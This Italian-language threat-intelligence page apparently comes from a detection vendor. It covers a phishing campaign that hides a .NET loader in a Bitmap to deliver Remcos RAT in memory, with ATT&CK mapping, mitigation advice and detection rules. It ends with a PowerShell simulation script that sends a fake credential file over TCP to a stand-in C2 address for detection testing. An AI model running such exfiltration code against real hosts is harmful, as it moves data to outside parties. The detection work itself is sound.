Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Una campagna malware a più stadi si basa sulla steganografia e l’esecuzione in memoria per distribuire più payload, incluso Remcos RAT. La catena d’infezione inizia con un’email di phishing contenente un archivio malevolo che rilascia un eseguibile .NET. Questo eseguibile utilizza risorse integrate e metodi steganografici per caricare le fasi successive direttamente in memoria, aiutando il malware a evitare il rilevamento su disco.
Indagine
L’indagine è iniziata dopo che la telemetria ha segnalato un file sospetto chiamato GST Debit Note Apr_26.com. Gli analisti hanno determinato che il file era un eseguibile .NET a 32 bit mascherato da gioco. Ulteriori analisi di reverse engineering hanno rivelato la steganografia incorporata in un oggetto Bitmap .NET, che nascondeva il caricatore di fase successiva, Optimax.dll, e permetteva la sua esecuzione completamente in memoria.
Mitigazione
Le organizzazioni dovrebbero implementare una robusta filtrazione delle email per bloccare allegati archivio sospetti e tentativi di phishing. Le soluzioni EDR dovrebbero essere in grado di rilevare l’esecuzione in memoria, la hollowing dei processi e comportamenti sospetti di PowerShell. I team dovrebbero anche monitorare i cambiamenti non autorizzati del registro, specialmente nelle chiavi Run, e imporre un controllo rigoroso delle applicazioni per prevenire l’avvio di eseguibili non firmati.
Risposta
Gli endpoint colpiti dovrebbero essere isolati immediatamente per limitare il movimento laterale e il furto di dati. Gli investigatori dovrebbero eseguire l’analisi forense della memoria per identificare i componenti fileless e confermare la presenza del Remcos_Mutex_Inj mutex. Un controllo completo dovrebbe verificare anche la persistenza non autorizzata nella directory AppData e nelle chiavi Run del registro, mentre le credenziali dovrebbero essere reset per qualsiasi utente i cui browser potrebbero essere stati accessi dal malware.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing[“<b>Azione</b> – <b idea=’T1566.001’>Phishing: Allegato Spearphishing</b><br/><b>Dettagli</b>: Archivio malevolo GST Debit Note Apr_26.com inviato alle vittime.”] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego[“<b idea=’T1027.003’>File o Informazioni Offuscati: Steganografia</b><br/><b>Dettagli</b>: Nascondere Optimax.dll all’interno di un oggetto Bitmap .NET serializzato<br/>nella sezione di risorse dell’eseguibile.”] class evasion_stego technique exec_appdomain[“<b idea=’T1574.014’>Dirottare Flusso di Esecuzione: AppDomainManager</b><br/><b>Dettagli</b>: Utilizzare riflessione e AppDomain.Load per eseguire<br/>payload direttamente dalla memoria senza toccare il disco.”] class exec_appdomain technique %% Second Stage loader_stage2[“<b idea=’T1055.012’>Iniezione di Processo: Hollowing di Processo</b><br/><b>Dettagli</b>: System Optimizer Ultimate.dll distribuisce il payload finale<br/>facendo l’hollowing di un processo del browser di default.”] class loader_stage2 technique malware_remcos[“<b idea=’Malware’>Remcos RAT</b><br/><b>Descrizione</b>: Trojan di Accesso Remoto distribuito<br/>come payload finale.”] class malware_remcos malware %% Persistence and Evasion evasion_sandbox[“<b idea=’T1497’>Evasione di Virtualizzazione/Sandbox</b><br/><b>Dettagli</b>: Controllo di sbiedll.dll e chiavi di registro<br/>per rilevare sandbox o macchine virtuali.”] class evasion_sandbox technique persistence_active[“<b idea=’T1547.014’>Esecuzione di Autostart su Boot o Logon: Active Setup</b><br/><b>Dettagli</b>: Copiare il malware in AppDataRoaming e<br/>configurare una chiave di registroRun per la persistenza.”] class persistence_active technique %% Collection and Exfiltration collect_browser[“<b idea=’T1217’>Rilevamento Informazioni del Browser</b><br/><b>Dettagli</b>: Raccolta delle credenziali di Chrome e Firefox.”] class collect_browser technique steal_cookies[“<b idea=’T1539’>Rubare il Cookie di Sessione Web</b><br/><b>Dettagli</b>: Cattura dei cookies di sessione web attivi.”] class steal_cookies technique exfil_c2[“<b idea=’T1041’>Esfiltrazione su Canale C2</b><br/><b>Dettagli</b>: Invio di dati catturati da logs.dat<br/>al aggressore tramite Command and Control.”] class exfil_c2 technique file_logs[“<b idea=’File’>logs.dat</b><br/><b>Descrizione</b>: File locale utilizzato per memorizzare<br/>credenziali rubate e cookies.”] class file_logs file %% Connections %% Flow of attack attack_phishing –>|leads_to| evasion_stego evasion_stego –>|unpacks| exec_appdomain exec_appdomain –>|loads| loader_stage2 loader_stage2 –>|deploys| malware_remcos %% Malware actions malware_remcos –>|performs| evasion_sandbox malware_remcos –>|establishes| persistence_active malware_remcos –>|performs| collect_browser collect_browser –>|leads_to| steal_cookies steal_cookies –>|saves_to| file_logs file_logs –>|sent_via| exfil_c2
Flusso d’attacco
Rilevamenti
Chiamare Metodi .NET Sospetti da Powershell (via powershell)
Visualizza
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizza
Possibilità di Esecuzione Tramite Linee di Comando PowerShell Nascoste (via cmdline)
Visualizza
Possibili Indicatori di Offuscamento PowerShell (via powershell)
Visualizza
Esfiltrazione di Dati Catturati a Command and Control [Connessione di Rete di Windows]
Visualizza
Esecuzione di Script PowerShell Offuscati in Campagna Loader Steganografica [Windows Powershell]
Visualizza
Rilevazione dell’Infezione Remcos RAT tramite Tecniche Steganografiche e Fileless [Creazione di Processo su Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo della Telemetria e Baseline deve essere passato.
Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa e Comandi dell’Attacco: L’avversario ha stabilito con successo un punto d’appoggio. Per completare l’obiettivo, raccolgono la telemetria di sistema e la nascondono in un file chiamato
logs.datper camuffarsi come log standard di sistema. L’avversario poi avvia una connessione di rete all’infrastruttura C2 stabilita (usando l’IP1.2.3.4e la porta37393per questa simulazione) per esfiltrare i dati. Questo imita il comportamento di un loader steganografico che cerca di spostare dati fuori dalla rete tramite un canale specifico e codificato. -
Script di Test di Regressione:
# Simulazione di Esfiltrazione Dati tramite specifico nome file e parametri C2 $C2_IP = "1.2.3.4" # IP C2 simulato $C2_PORT = 37393 $FILENAME = "logs.dat" # 1. Crea il file di dati 'malevole' Write-Output "Dati Sensibili: UserCredentials_Admin_Pass123" | Out-File -FilePath "$env:TEMP$FILENAME" # 2. Simula la connessione di rete al C2 # Usare un Client TCP per forzare la telemetria di porta/IP specifica try { $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT) $stream = $client.GetStream() $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content "$env:TEMP$FILENAME")) $stream.Write($data, 0, $data.Length) $client.Close() } catch { Write-Host "Connessione fallita (Prevista se l'IP è inesistente), ma la telemetria dovrebbe essere catturata dal firewall." } -
Comandi di Pulizia:
# Rimuovi il file malevolo simulato Remove-Item -Path "$env:TEMPlogs.dat" -ErrorAction SilentlyContinue